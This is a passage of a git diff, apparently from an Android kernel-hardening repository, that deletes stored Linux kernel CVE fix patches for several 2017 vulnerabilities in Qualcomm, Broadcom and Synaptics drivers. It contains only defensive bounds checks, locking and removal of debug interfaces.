fwu_sysfs_write_config_store), -@@ -2360,6 +2373,7 @@ static struct device_attribute attrs[] = { - __ATTR(package_id, S_IRUGO, - fwu_sysfs_package_id_show, - synaptics_rmi4_store_error), -+#endif - }; - - -@@ -2470,6 +2484,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work); - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj, - &dev_attr_data); - if (retval < 0) { -@@ -2478,6 +2493,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - __func__); - goto exit_free_mem; - } -+#endif - - for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) { - retval = 
sysfs_create_file(&rmi4_data->i2c_client->dev.kobj, -@@ -2511,7 +2527,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - &attrs[attr_count].attr); - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -+#endif - - exit_free_mem: - kfree(fwu->fn_ptr); -@@ -2528,7 +2546,9 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data) - { - unsigned char attr_count; - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -+#endif - - for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) { - sysfs_remove_file(&rmi4_data->input_dev->dev.kobj, diff --git a/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch deleted file mode 100644 index 0a9424c6..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch +++ /dev/null 
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
-
- config TOUCHSCREEN_TOUCH_FW_UPDATE
- tristate "Touchscreen firmware update"
-- default y
- help
- Say Y here to support touch firmware update
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch
deleted file mode 100644
index 0a9424c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
-
- config TOUCHSCREEN_TOUCH_FW_UPDATE
- tristate "Touchscreen firmware update"
-- default y
- help
- Say Y here to support touch firmware update
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch
deleted file mode 100644
index 7763f01f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch
+++ /dev/null
@@ -1,124 +0,0 @@
-From 323a28bf14c622bdd1b9ecf09a339b00af98c965 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 23 Nov 2016 08:29:33 -0800
-Subject: [PATCH] net: wireless: bcmdhd: remove PCIe debug IOVAR access
-
-delete PCIe debug IOVARs in production build.
-
-BUG: 31707909
-
-Signed-off-by: Insun Song
-Change-Id: Icd659169eeae3e587bec1f5587511a354d482a33
----
- drivers/net/wireless/bcmdhd/dhd_pcie.c | 98 ----------------------------------
- 1 file changed, 98 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pcie.c b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-index 26201a6d2f39d..c56f789c4797f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pcie.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-@@ -2609,104 +2609,6 @@ dhdpcie_bus_doiovar(dhd_bus_t *bus, const bcm_iovar_t *vi, uint32 actionid, cons
- bcmerror = dhdpcie_downloadvars(bus, arg, len);
- break;
-
-- case IOV_SVAL(IOV_PCIEREG):
-- si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configaddr), ~0,
-- int_val);
-- si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configdata), ~0,
-- int_val2);
-- break;
--
-- case IOV_GVAL(IOV_PCIEREG):
-- si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configaddr), ~0,
-- int_val);
-- int_val = si_corereg(bus->sih, bus->sih->buscoreidx,
-- OFFSETOF(sbpcieregs_t, configdata), 0, 0);
-- bcopy(&int_val, arg, sizeof(int_val));
-- break;
--
-- case IOV_GVAL(IOV_BAR0_SECWIN_REG):
-- {
-- uint32 cur_base, base;
-- uchar *bar0;
-- volatile uint32 *offset;
-- /* set the bar0 secondary window to this */
-- /* write the register value */
-- cur_base = dhdpcie_bus_cfg_read_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint));
-- base = int_val & 0xFFFFF000;
-- dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), base);
-- bar0 = (uchar *)bus->regs;
-- offset = (uint32 *)(bar0 + 0x4000 + (int_val & 0xFFF));
-- int_val = *offset;
-- bcopy(&int_val, arg, sizeof(int_val));
-- dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), cur_base);
-- }
-- break;
-- case IOV_SVAL(IOV_BAR0_SECWIN_REG):
-- {
-- uint32 cur_base, base;
-- uchar *bar0;
-- volatile uint32 *offset;
-- /* set the bar0 secondary window to this */
-- /* write the register value */
-- cur_base = dhdpcie_bus_cfg_read_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint));
-- base = int_val & 0xFFFFF000;
-- dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), base);
-- bar0 = (uchar *)bus->regs;
-- offset = (uint32 *)(bar0 + 0x4000 + (int_val & 0xFFF));
-- *offset = int_val2;
-- bcopy(&int_val2, arg, val_size);
-- dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), cur_base);
-- }
-- break;
--
-- case IOV_SVAL(IOV_PCIECOREREG):
-- si_corereg(bus->sih, bus->sih->buscoreidx, int_val, ~0, int_val2);
-- break;
-- case IOV_GVAL(IOV_SBREG):
-- {
-- sdreg_t sdreg;
-- uint32 addr, coreidx;
--
-- bcopy(params, &sdreg, sizeof(sdreg));
--
-- addr = sdreg.offset;
-- coreidx = (addr & 0xF000) >> 12;
--
-- int_val = si_corereg(bus->sih, coreidx, (addr & 0xFFF), 0, 0);
-- bcopy(&int_val, arg, sizeof(int32));
-- break;
-- }
--
-- case IOV_SVAL(IOV_SBREG):
-- {
-- sdreg_t sdreg;
-- uint32 addr, coreidx;
--
-- bcopy(params, &sdreg, sizeof(sdreg));
--
-- addr = sdreg.offset;
-- coreidx = (addr & 0xF000) >> 12;
--
-- si_corereg(bus->sih, coreidx, (addr & 0xFFF), ~0, sdreg.value);
--
-- break;
-- }
--
--
-- case IOV_GVAL(IOV_PCIECOREREG):
-- int_val = si_corereg(bus->sih, bus->sih->buscoreidx, int_val, 0, 0);
-- bcopy(&int_val, arg, sizeof(int_val));
-- break;
--
-- case IOV_SVAL(IOV_PCIECFGREG):
-- OSL_PCI_WRITE_CONFIG(bus->osh, int_val, 4, int_val2);
-- break;
--
-- case IOV_GVAL(IOV_PCIECFGREG):
-- int_val = OSL_PCI_READ_CONFIG(bus->osh, int_val, 4);
-- bcopy(&int_val, arg, sizeof(int_val));
-- break;
--
- case IOV_SVAL(IOV_PCIE_LPBK):
- bcmerror = dhdpcie_bus_lpback_req(bus, int_val);
- break;
diff --git a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch
deleted file mode 100644
index 49e142d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@ -From 59f55cd40b5f44941afc78b78e5bf81ad3dd723e Mon Sep 17 00:00:00 2001 -From: Josh Kirsch -Date: Mon, 2 May 2016 14:55:04 -0700 -Subject: drivers: soc: Add buffer overflow check for svc send request - -Add buffer overflow check in voice_svc_send_req. - -CRs-fixed: 1010081 -Change-Id: I4ae703334b0cf04f327b392bc9cd6febd4ad32f2 -Signed-off-by: Josh Kirsch ---- - drivers/soc/qcom/qdsp6v2/voice_svc.c | 46 +++++++++++++++++++++++++----------- - 1 file changed, 32 insertions(+), 14 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c -index 23b8292..67c58d1 100644 ---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c -+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -188,7 +188,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request, - int ret = 0; - void *apr_handle = NULL; - struct apr_data *aprdata = NULL; -- uint32_t user_payload_size = 0; -+ uint32_t user_payload_size; -+ uint32_t payload_size; - - pr_debug("%s\n", __func__); - -@@ -200,15 +201,19 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request, - } - - user_payload_size = apr_request->payload_size; -+ payload_size = sizeof(struct apr_data) + user_payload_size; - -- aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size, -- GFP_KERNEL); -- -- if (aprdata == NULL) { -- pr_err("%s: aprdata kmalloc failed.\n", __func__); -- -- ret = -ENOMEM; -+ if (payload_size <= user_payload_size) { -+ pr_err("%s: invalid payload size ( 0x%x ).\n", -+ __func__, user_payload_size); -+ ret = -EINVAL; - goto done; -+ } else { -+ aprdata = kmalloc(payload_size, GFP_KERNEL); -+ if (aprdata == NULL) { -+ ret = -ENOMEM; -+ 
goto done; -+ } - } - - voice_svc_update_hdr(apr_request, aprdata); -@@ -388,18 +393,31 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - - switch (cmd) { - case MSG_REGISTER: -- ret = process_reg_cmd( -+ if (count >= -+ (sizeof(struct voice_svc_register) + -+ sizeof(*data))) { -+ ret = process_reg_cmd( - (struct voice_svc_register *)data->payload, prtd); -- if (!ret) -- ret = count; -- -+ if (!ret) -+ ret = count; -+ } else { -+ pr_err("%s: invalid payload size\n", __func__); -+ ret = -EINVAL; -+ goto done; -+ } - break; - case MSG_REQUEST: -+ if (count >= (sizeof(struct voice_svc_cmd_request) + -+ sizeof(*data))) { - ret = voice_svc_send_req( - (struct voice_svc_cmd_request *)data->payload, prtd); - if (!ret) - ret = count; -- -+ } else { -+ pr_err("%s: invalid payload size\n", __func__); -+ ret = -EINVAL; -+ goto done; -+ } - break; - default: - pr_debug("%s: Invalid command: %u\n", __func__, cmd); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch deleted file mode 100644 index f16c4d87..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch +++ /dev/null 
@@ -1,106 +0,0 @@ -From 35346beb2d8882115f698ab22a96803552b5c57e Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Tue, 4 Oct 2016 12:24:28 -0700 -Subject: drivers: soc: add size checks and update log messages - -Add size checks to validate minimum size is met. Update log messages -to include only relevant information to ensure logs are accurate and -useful. - -Change-Id: Idf76a7d964ec6989a0474d49895e54103f17938b -CRs-fixed: 1073129 -Signed-off-by: Siena Richard ---- - drivers/soc/qcom/qdsp6v2/voice_svc.c | 41 ++++++++++++++++++++++++++---------- - 1 file changed, 30 insertions(+), 11 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c -index 67c58d1..50dd925 100644 ---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c -+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c -@@ -223,8 +223,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request, - } else if (!strcmp(apr_request->svc_name, VOICE_SVC_MVM_STR)) { - apr_handle = prtd->apr_q6_mvm; - } else { -- pr_err("%s: Invalid service %s\n", __func__, -- apr_request->svc_name); -+ pr_err("%s: Invalid service %.*s\n", __func__, -+ MAX_APR_SERVICE_NAME_LEN, apr_request->svc_name); - - ret = -EINVAL; - goto done; -@@ -338,8 +338,8 @@ static int process_reg_cmd(struct voice_svc_register *apr_reg_svc, - svc = VOICE_SVC_CVS_STR; - handle = &prtd->apr_q6_cvs; - } else { -- pr_err("%s: Invalid Service: %s\n", __func__, -- apr_reg_svc->svc_name); -+ pr_err("%s: Invalid Service: %.*s\n", __func__, -+ MAX_APR_SERVICE_NAME_LEN, apr_reg_svc->svc_name); - ret = -EINVAL; - goto done; - } -@@ -365,7 +365,17 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - - pr_debug("%s\n", __func__); - -- data = kmalloc(count, GFP_KERNEL); -+ /* -+ * Check if enough memory is allocated to parse the message type. -+ * Will check there is enough to hold the payload later. 
-+ */ -+ if (count >= sizeof(struct voice_svc_write_msg)) { -+ data = kmalloc(count, GFP_KERNEL); -+ } else { -+ pr_debug("%s: invalid data size\n", __func__); -+ ret = -EINVAL; -+ goto done; -+ } - - if (data == NULL) { - pr_err("%s: data kmalloc failed.\n", __func__); -@@ -383,7 +393,7 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - } - - cmd = data->msg_type; -- prtd = (struct voice_svc_prvt *)file->private_data; -+ prtd = (struct voice_svc_prvt *) file->private_data; - if (prtd == NULL) { - pr_err("%s: prtd is NULL\n", __func__); - -@@ -393,9 +403,13 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - - switch (cmd) { - case MSG_REGISTER: -- if (count >= -- (sizeof(struct voice_svc_register) + -- sizeof(*data))) { -+ /* -+ * Check that count reflects the expected size to ensure -+ * sufficient memory was allocated. Since voice_svc_register -+ * has a static size, this should be exact. -+ */ -+ if (count == (sizeof(struct voice_svc_write_msg) + -+ sizeof(struct voice_svc_register))) { - ret = process_reg_cmd( - (struct voice_svc_register *)data->payload, prtd); - if (!ret) -@@ -407,8 +421,13 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - } - break; - case MSG_REQUEST: -- if (count >= (sizeof(struct voice_svc_cmd_request) + -- sizeof(*data))) { -+ /* -+ * Check that count reflects the expected size to ensure -+ * sufficient memory was allocated. Since voice_svc_cmd_request -+ * has a variable size, check the minimum value count must be. -+ */ -+ if (count >= (sizeof(struct voice_svc_write_msg) + -+ sizeof(struct voice_svc_cmd_request))) { - ret = voice_svc_send_req( - (struct voice_svc_cmd_request *)data->payload, prtd); - if (!ret) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch deleted file mode 100644 index 8ad73f60..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch +++ /dev/null 
@@ -1,55 +0,0 @@ -From 4fa7499742c56c7f7064c9dc14c3a34f4be38851 Mon Sep 17 00:00:00 2001 -From: Ariel Yin -Date: Fri, 13 Jan 2017 13:58:56 -0800 -Subject: [PATCH] msm: vidc: WARN_ON() reveals fuction addresses - -There is a security vulnerability where function addresses are -printed in kernel message if WARN_ON() is invoked implicitly. -WARN_ON() call is made explicit to avoid this issue. - -Bug: 32873615 -CRs-Fixed: 1093693 -Change-Id: If75581803adf62cb9bda3784ad1d4f4088e0d797 -Signed-off-by: Sanjay Singh -Signed-off-by: Biswajit Paul ---- - drivers/media/platform/msm/vidc/msm_vidc.c | 3 ++- - drivers/media/platform/msm/vidc/venus_hfi.c | 4 ++-- - 2 files changed, 4 insertions(+), 3 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c -index 0f55f3254a43b..b90ebc11d527a 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc.c -@@ -1405,7 +1405,8 @@ static void cleanup_instance(struct msm_vidc_inst *inst) - debugfs_remove_recursive(inst->debugfs_root); - - mutex_lock(&inst->pending_getpropq.lock); -- WARN_ON(!list_empty(&inst->pending_getpropq.list)); -+ WARN_ON(!list_empty(&inst->pending_getpropq.list) -+ && (msm_vidc_debug & VIDC_INFO)); - mutex_unlock(&inst->pending_getpropq.lock); - } - } -diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c -index a7a391f9c8d30..6f6d79a1f6946 100644 ---- a/drivers/media/platform/msm/vidc/venus_hfi.c -+++ b/drivers/media/platform/msm/vidc/venus_hfi.c -@@ -261,7 +261,7 @@ static int venus_hfi_acquire_regulator(struct regulator_info *rinfo) - rinfo->name); - } - } -- WARN_ON(!regulator_is_enabled(rinfo->regulator)); -+ WARN_ON(!regulator_is_enabled(rinfo->regulator) && (msm_vidc_debug & VIDC_INFO)); - return rc; - } - -@@ -3954,7 +3954,7 @@ static int venus_hfi_disable_regulator(struct regulator_info *rinfo) - disable_regulator_failed: - - /* Bring attention to this 
issue */ -- WARN_ON(1); -+ WARN_ON(msm_vidc_debug & VIDC_INFO); - return rc; - } - diff --git a/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch b/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch deleted file mode 100644 index 7aef755b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch +++ /dev/null @@ -1,38 +0,0 @@ -From ddf864f37134df0960d337ff16e6f2435b4fe90c Mon Sep 17 00:00:00 2001 -From: Manjeet Singh -Date: Fri, 10 Feb 2017 19:03:38 +0530 -Subject: wlan: Add buf len check in wlan_hdd_cfg80211_testmode - -In __wlan_hdd_cfg80211_testmode API no checks are in place that -ensure that buflen is smaller or equal the size of the stack -variable hb_params. Hence, the vos_mem_copy() call can overflow -stack memory. - -Add buf len check to avoid stack overflow. - -CRs-Fixed: 1105085 -Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c ---- - CORE/HDD/src/wlan_hdd_cfg80211.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index 81c3944..0c0bca2 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -16424,6 +16424,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy, void *data, int len - buf = nla_data(tb[WLAN_HDD_TM_ATTR_DATA]); - buf_len = nla_len(tb[WLAN_HDD_TM_ATTR_DATA]); - -+ if (buf_len > sizeof(*hb_params)) { -+ hddLog(LOGE, FL("buf_len=%d exceeded hb_params size limit"), -+ buf_len); -+ return -ERANGE; -+ } -+ - hb_params_temp =(tSirLPHBReq *)buf; - if ((hb_params_temp->cmd == LPHB_SET_TCP_PARAMS_INDID) && - (hb_params_temp->params.lphbTcpParamReq.timePeriodSec == 0)) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch deleted file mode 100644 index e41b97d8..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch +++ /dev/null 
@@ -1,38 +0,0 @@
-From 29c4ddb447b2d49409a9d0b93631f84a9d2e922e Mon Sep 17 00:00:00 2001
-From: Manjeet Singh
-Date: Tue, 27 Dec 2016 17:48:37 +0530
-Subject: qcacld-2.0: Add buf len check in wlan_hdd_cfg80211_testmode
-
-In __wlan_hdd_cfg80211_testmode API no checks are in place that
-ensure that buflen is smaller or equal the size of the stack
-variable hb_params. Hence, the vos_mem_copy() call can overflow
-stack memory.
-
-Add buf len check to avoid stack overflow
-
-CRs-Fixed: 1105085
-Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ad4ef2..54605a2 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -26336,6 +26336,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
- (hb_params_temp->params.lphbTcpParamReq.timePeriodSec == 0))
- return -EINVAL;
-
-+ if (buf_len > sizeof(*hb_params)) {
-+ hddLog(LOGE, FL("buf_len=%d exceeded hb_params size limit"),
-+ buf_len);
-+ return -ERANGE;
-+ }
-+
- hb_params = (tSirLPHBReq *)vos_mem_malloc(sizeof(tSirLPHBReq));
- if (NULL == hb_params) {
- hddLog(LOGE, FL("Request Buffer Alloc Fail"));
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch
deleted file mode 100644
index 3f8a3310..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From a2959858f428acfca3ca4c61d3c10b446bfe9b60 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh
-Date: Tue, 3 Jan 2017 12:08:10 +0530
-Subject: qcacld-3.0: Add buf len check in wlan_hdd_cfg80211_testmode
-
-qcacld-2.0 to qcacld-3.0 propagation.
-
-In __wlan_hdd_cfg80211_testmode API no checks are in place that
-ensure that buflen is smaller or equal the size of the stack
-variable hb_params. Hence, the vos_mem_copy() call can overflow
-stack memory.
-
-Add buf len check to avoid stack overflow
-
-CRs-Fixed: 1105085
-Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c
----
- core/hdd/src/wlan_hdd_cfg80211.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 98b0012..1f34e4c 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -14974,6 +14974,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
- timePeriodSec == 0))
- return -EINVAL;
-
-+ if (buf_len > sizeof(*hb_params)) {
-+ hdd_err("buf_len=%d exceeded hb_params size limit",
-+ buf_len);
-+ return -ERANGE;
-+ }
-+
- hb_params =
- (tSirLPHBReq *) qdf_mem_malloc(sizeof(tSirLPHBReq));
- if (NULL == hb_params) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch
deleted file mode 100644
index 48e7fed3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch
+++ /dev/null
@@ -1,119 +0,0 @@ -From 01f3ad23574c85a060e6add7a20173621b5b2c77 Mon Sep 17 00:00:00 2001 -From: kunleiz -Date: Thu, 22 Dec 2016 18:03:37 +0800 -Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length - -Add mutex protection to avoid access output_len in parallel. - -CRs-Fixed: 1104067 -Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d -Signed-off-by: kunleiz ---- - drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++- - 1 file changed, 15 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -index d4fddf3..7a8e6f8 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2014, 2016, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2014, 2016-2017, The Linux Foundation. All rights reserved. - * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -29,6 +29,8 @@ struct q6audio_effects { - struct audio_client *ac; - struct msm_hwacc_effects_config config; - -+ struct mutex lock; -+ - atomic_t in_count; - atomic_t out_count; - -@@ -231,8 +233,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - uint32_t idx = 0; - uint32_t size = 0; - -+ mutex_lock(&effects->lock); -+ - if (!effects->started) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -242,11 +247,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - if (!rc) { - pr_err("%s: write wait_event_timeout\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - if (!atomic_read(&effects->out_count)) { - pr_err("%s: pcm stopped out_count 0\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -256,6 +263,7 @@ static int 
audio_effects_shared_ioctl(struct file *file, unsigned cmd, - copy_from_user(bufptr, (void *)arg, - effects->config.buf_cfg.output_len)) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - rc = q6asm_write(effects->ac, -@@ -263,6 +271,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - 0, 0, NO_TIMESTAMP); - if (rc < 0) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - atomic_dec(&effects->out_count); -@@ -270,6 +279,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n", - __func__); - } -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_READ: { -@@ -458,6 +468,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - break; - } - case AUDIO_EFFECTS_SET_BUF_LEN: { -+ mutex_lock(&effects->lock); - if (copy_from_user(&effects->config.buf_cfg, (void *)arg, - sizeof(effects->config.buf_cfg))) { - pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n", -@@ -467,6 +478,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - pr_debug("%s: write buf len: %d, read buf len: %d\n", - __func__, effects->config.buf_cfg.output_len, - effects->config.buf_cfg.input_len); -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_GET_BUF_AVAIL: { -@@ -711,6 +723,7 @@ static int audio_effects_release(struct inode *inode, struct file *file) - } - q6asm_audio_client_free(effects->ac); - -+ mutex_destroy(&effects->lock); - kfree(effects); - - pr_debug("%s: close session success\n", __func__); -@@ -741,6 +754,7 @@ static int audio_effects_open(struct inode *inode, struct file *file) - - init_waitqueue_head(&effects->read_wait); - init_waitqueue_head(&effects->write_wait); -+ mutex_init(&effects->lock); - - effects->opened = 0; - effects->started = 0; --- -cgit v1.1 - 
